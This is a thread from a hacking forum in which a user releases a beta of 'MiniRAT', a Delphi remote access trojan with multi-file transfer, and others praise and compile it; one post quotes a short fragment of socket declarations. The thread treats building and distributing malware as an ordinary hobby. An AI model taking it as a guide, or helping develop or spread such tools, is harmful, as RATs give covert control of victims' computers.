+ Reply to Thread
Page 1 of 3 123 LastLast
Results 1 to 10 of 26
  1. #1
    Senior Member
    Join Date
    Dec 2007
    Location
    Earth
    Posts
    1,453

    MiniRAT 0.5c Beta 1 with Multifiletransfer

    Today i worked on the Multiple File Transfer....
    You can now download up to 10-50 Files once with the fastest Rates which are possible...
    Upload is not done yet but i will work on it tommorow!

    Attached Files Attached Files
    [url=http://www.userbars.com][img]http://img145.imageshack.us/img145/9996/ubd1841.png[/img][/url]
    [QUOTE=francewar;125769]TBH, i dont fucking care if we have a good rep @ OpenSc. Its the biggest skid forum ever. HF has alot more mature people then this forum.[/QUOTE]
    Doing custom coding. PM me for requests.

  2. #2
    Member
    Join Date
    Oct 2009
    Location
    earth
    Posts
    30
    Thanx for your great work and public version

    Great work great man !

  3. #3
    Senior Member
    Join Date
    Sep 2009
    Location
    London | United Kingdom
    Posts
    592
    well i have to admit im not a delphi programer when it comes down to delphi i have the brain of a melon but this looks mighty inpressive for a delphi rat code (downloaded and compiled with delphi 2007 lite.)

    im looking forward to seeing more keep up the good work slayer
    ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
    ░█▀▀░▀█▀░█▀▀░█▀█░█████░░░░░█░█░█▀█░█▀▀░█░█░█▀▀░░░█▀▀░█▀█░█████░
    ░▀▀█░░█░░█▀▀░█▀█░█▀█▀█░▀▀▀░█▀█░█▀█░█░░░██░░▀▀█░░░█░░░█░█░█▀█▀█░
    ░▀▀▀░░▀░░▀▀▀░▀░▀░▀░▀░▀░░░░░▀░▀░▀░▀░▀▀▀░▀░▀░▀▀▀░▀░▀▀▀░▀▀▀░▀░▀░▀░
    ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
    ☻/
    /▌
    / \
    [URL="http://www.youtube.com/C0nw0nk"]http://www.youtube.com/C0nw0nk[/URL]
    [url]http://www.steam-hacks.com/[/url]

  4. #4
    Senior Member
    Join Date
    Aug 2008
    Location
    In your stack O___O
    Posts
    3,101
    Code:
    BlockList   :Array[0..99] Of String;
      Public
        SocketList  :Array[0..99] Of TSocket;
        Port        :Integer;
        Count       :Integer;
        ReturnError :Integer;
    
        Function Listen: Integer;
        Function AcceptNew(SSock: TSocket): Integer;
        Function GetFreeHandle(VAR Int: Integer): Integer;
        Function ReCount: Integer;
        Function Disconnect(dAddress, dPort: String): Boolean;
    
        Procedure ResolveStatus(Int: Integer);
      End;
    
    var
      TransferInfo: TTransferInfo;
      rSocket: RemoteSock;
      Password: String;
      HandleList: Array[0..99] Of THandle;
      TransferList: Array[0..99] Of THandle;
    I thought you had taken off the max number of users restriction
    [img]http://www.photochopz.com/forum/images/smilies/fap.gif[/img]In The Oven (err in Development) : Pie [img]http://www.photochopz.com/forum/images/smilies/fap.gif[/img]
    [QUOTE=uraskiddie;115188]What are you? Like 10 years old?
    That's complete rubbish, you probably got your depictions of being a "hacker" from a prepubescent forum infested with homosexually-oriented pedophiles.[/QUOTE]
    [QUOTE=Envy;136433]Russian?
    Trusted.
    Botnets are like our right hands.[/QUOTE]
    [url]http://cognitivity.org/[/url]

  5. #5
    Member
    Join Date
    Feb 2008
    Posts
    35
    slayer616's you should use ICS TWSocket instead of old holes TSocket

  6. #6
    Senior Member
    Join Date
    Dec 2007
    Location
    Earth
    Posts
    1,453
    @mjrod: Sry i forgot to remove them, if you look into the whole Socket Accept Handling you should see that i dont use the Array anymore!

    @others: I found several Bugs, which got fixed
    [url=http://www.userbars.com][img]http://img145.imageshack.us/img145/9996/ubd1841.png[/img][/url]
    [QUOTE=francewar;125769]TBH, i dont fucking care if we have a good rep @ OpenSc. Its the biggest skid forum ever. HF has alot more mature people then this forum.[/QUOTE]
    Doing custom coding. PM me for requests.

  7. #7
    Senior Member
    Join Date
    Dec 2007
    Location
    Earth
    Posts
    1,453
    Ok i am working on a safe threaded File Transfer since the access to the listview in the Transferview can cause problems...

    With the safe-threaded Function this RAT will be pretty stable...
    [url=http://www.userbars.com][img]http://img145.imageshack.us/img145/9996/ubd1841.png[/img][/url]
    [QUOTE=francewar;125769]TBH, i dont fucking care if we have a good rep @ OpenSc. Its the biggest skid forum ever. HF has alot more mature people then this forum.[/QUOTE]
    Doing custom coding. PM me for requests.

  8. #8
    Senior Member
    Join Date
    Dec 2007
    Location
    Earth
    Posts
    1,453
    I changed my mind, since some guys gave me some advice to stop doing that opensource, the next releases will be just aviable as binaries...
    [url=http://www.userbars.com][img]http://img145.imageshack.us/img145/9996/ubd1841.png[/img][/url]
    [QUOTE=francewar;125769]TBH, i dont fucking care if we have a good rep @ OpenSc. Its the biggest skid forum ever. HF has alot more mature people then this forum.[/QUOTE]
    Doing custom coding. PM me for requests.

  9. #9
    Unregistered
    Guest
    Quote Originally Posted by slayer616 View Post
    I changed my mind, since some guys gave me some advice to stop doing that opensource, the next releases will be just aviable as binaries...
    And how is the ripper then?

  10. #10
    Unregistered
    Guest
    is this delphi 7?

 

 

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. MiniRAT 0.5c
    By slayer616 in forum Malware sources
    Replies: 14
    Last Post: 04-01-2010, 08:15
  2. MiniRAT 0.5b
    By LttCoder in forum Malware sources
    Replies: 40
    Last Post: 25-11-2009, 13:43
  3. MiniRAT 0.5b Filetransfer explaination plz?
    By Nuffe in forum Delphi Help
    Replies: 3
    Last Post: 10-10-2007, 09:51
  4. p0ke's miniRAT 0.5b help
    By Kill3r7 in forum General Programming Help
    Replies: 2
    Last Post: 23-09-2007, 11:52
  5. MiniRat / Sockets
    By Previous Encounter in forum Delphi Help
    Replies: 2
    Last Post: 16-01-2007, 13:50

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
All times are GMT +1. The time now is 21:38.
www.opensc.ws
Copyright ©2005 - 2012, OpenSC Forums



Search Engine Friendly URLs by vBSEO 3.6.0 ©2011, Crawlability, Inc.